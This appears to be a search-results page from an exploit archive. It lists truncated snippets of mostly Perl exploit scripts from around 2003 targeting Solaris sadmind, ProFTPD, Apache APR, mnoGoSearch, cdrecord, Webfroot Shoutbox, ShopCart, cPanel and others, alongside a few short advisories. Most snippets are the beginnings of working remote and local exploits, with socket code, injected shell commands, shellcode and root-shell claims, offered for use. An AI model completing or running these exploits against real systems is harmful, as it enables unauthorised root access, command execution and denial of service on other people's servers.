1087 matches found
Solaris Sadmind Default Configuration Remote Root Exploit
Exploit for solaris platform in category remote exploits ========================================================= Solaris Sadmind Default Configuration Remote Root Exploit ========================================================= !/usr/bin/perl -w Title: rootdown.pl Purpose: Solaris Remote comma...
ProFTPD 1.2.9RC1 (mod_sql) Remote SQL Injection Exploit
Exploit for linux platform in category remote exploits ======================================================= ProFTPD 1.2.9RC1 modsql Remote SQL Injection Exploit ======================================================= !/usr/bin/perl ProFTPD 1.2.9 rc1 modsql SQL Injection remote Exploit Spaine -...
ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection
!/usr/bin/perl ProFTPD 1.2.9 rc1 modsql SQL Injection remote Exploit Spaine - 2003 use IO::Socket; if@ARGC 1=Alternate query\n\n"; exit0; ; $server = $ARGV0; $query = $ARGV1; $remote = IO::Socket::INET-newProto="tcp",PeerAddr=$server,PeerPort="21",Reuse=1 or die "Can't connect. \n"; ifdefined$lin...
Mandrake Linux 8.2 - usrmail Local Overflow
Mandrake Linux 8.2 - usrmail Local Overflow !/usr/bin/perl Mandrake 8.2 /usr/mail local exploit Usage: perl d86mail.pl offset Then enter "." dot and press 'Enter' Example: satan@localhost my$ perl d86mail.pl eip: 0xbffffddd .enter Cc: too long to edit sh-2.05$ $shellcode =...
mnoGoSearch 3.1.20 Remote Command Execution Exploit
Exploit for linux platform in category remote exploits =================================================== mnoGoSearch 3.1.20 Remote Command Execution Exploit =================================================== !/usr/bin/perl reloaded Remote Exploit for mnoGoSearch 3.1.20 that performs remote...
Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
No description provided by source. !/usr/bin/perl Apache 2.0.37 - 2.0.45 APR Exploit Written By Matthew Murphy This Perl script will successfully exploit any un-patched Apache 2.x servers. Base64 Encoder If you want authentication with the server via HTTP's lame Basic auth, put the proper string ...
Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
Exploit for linux platform in category remote exploits ====================================================== Apache ; $host =...
Apache 2.0.45 - 'APR' Crash
!/usr/bin/perl Apache 2.0.37 - 2.0.45 APR Exploit Written By Matthew Murphy This Perl script will successfully exploit any un-patched Apache 2.x servers. Base64 Encoder If you want authentication with the server via HTTP's lame Basic auth, put the proper string to encode BASE64 content, and use...
WebCortex WebStores2000 - SQL Injection
WebCortex WebStores2000 - SQL Injection source: https://www.securityfocus.com/bid/7766/info This vulnerability is reportedly caused by a lack of sufficient sanitization of user-supplied data contained in URI parameters supplied to WebStores2000. Successful exploitation may allow for modification ...
Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
Exploit for linux platform in category remote exploits ================================================ Webfroot Shoutbox ';fclose$h;? HTTP/1.1\nHost: 127.0.0.1\nConnection: Close\n\n"; my $conn; if $ARGV0 eq "x" || $ARGV0 eq "r" $type = $ARGV0; else print "x Webfroot Shoutbox 2.32 on apache...
Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
No description provided by source. !/usr/bin/perl Webfroot Shoutbox 2.32 on apache exploit use IO::Socket; my $host = "127.0.0.1"; my $port = 80; my $shoutbox = "shoutbox.php?conf="; my $shoutboxpath = "/shoutbox"; my $cmd = "ls -l"; my $conn; my $type; my @logs = "/etc/httpd/logs/acceslog",...
CdRecord Version <= 2.0 Mandrake local root exploit
No description provided by source. !/usr/bin/perl Cdrecord version 2.0 and local root exploit. wsxz@localhost buffer$ perl priv8cdr.pl 4 Using target number 4 Using Mr .dtors 0x808c82c Cdrecord 2.0 i586-mandrake-linux-gnu scsibus: -1 target: -1 lun: -1 Warning: Open by 'devname' is unintentional...
An Implementation of a Birthday Attack in a DNS Spoofing
An Implementation of a Birthday Attack in a DNS Spoofing. By Ramon Izaguirre. 0.- Introduction, In november 2002 Vagner Sacramento discovered that a dns server would reply with n responses to n queries made from different ip addresses for the same domain...
Xeneo Web Server 2.2.9.0 Denial of Service Exploit
No description provided by source. !/usr/bin/perl Xeneo Web Server DoS Vulnerable systems: Xeneo. Web Server 2.2.9.0 Written by badpack3t [email protected] For SP Research Labs 04/21/2003 www.security-protocols.com usage: perl sp-xeneo.pl target port use IO::Socket; use strict; pri...
Xeneo Web Server 2.2.9.0 - Denial of Service
Xeneo Web Server 2.2.9.0 - Denial of Service !/usr/bin/perl Xeneo Web Server DoS Vulnerable systems: Xeneo. Web Server 2.2.9.0 Written by badpack3t For SP Research Labs 04/21/2003 www.security-protocols.com usage: perl sp-xeneo.pl use IO::Socket; use strict; print ".:."x 20; print "\nXeneo Web...
ShopCart.pl
Shopcart exploit Spawn bash style Shell with webserver uid Spabam 2003 PRIV8 code hackarena irc.brasnet.org This Script is currently under development use strict; use IO::Socket; my $host; my $port; my $command; my $url; my @results; my $probe; my @U; my $shit; $U1 = "/cgi-local/shop.pl/page=;";...
CC GuestBook cc_guestbook.pl Multiple Parameter XSS
The remote host is running ccguestbook.pl, a guestbook written in Perl. This CGI is vulnerable to a cross-site scripting attack. An attacker may use this flaw to steal the cookies of your users. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. Ref: From: "BrainRawt ." To:...
ProtWare "HTML Guardian" has pathetic "encryption"
For $40 or $70, ProtWare's "HTML Guardian" http://www.protware.com claims to "encrypt html code and javascripts, making it impossible to reuse them." Unfortunately, "HTML Guardian" does not do anything more than to obfuscate the HTML source code. There is no encryption. In fact, the JavaScript th...
ProtWare HTML Guardian 6.x - Encryption
source: https://www.securityfocus.com/bid/7169/info A weakness has been reported in the encryption scheme used by ProtWare HTML Guardian. Specifically, the encryption scheme implemented obfuscates data using a simple bit shifting technique, making it trivial for attackers to reverse. Administrato...
cpanel-VH.pl
!usr/bin/perl use LWP::UserAgent print "\n"; print " \n"; print " Remote Exploit for Cpanel 5 \n"; print " \n"; print "\n"; print " C0d3r: CaMaLeoN\n"; die "Use: $0 \n" unless $ARGV1; $web=$ARGV0; $comando=$ARGV1; $fallos="cgi-sys/guestbook.cgi?user=cpanel&template=$comando";...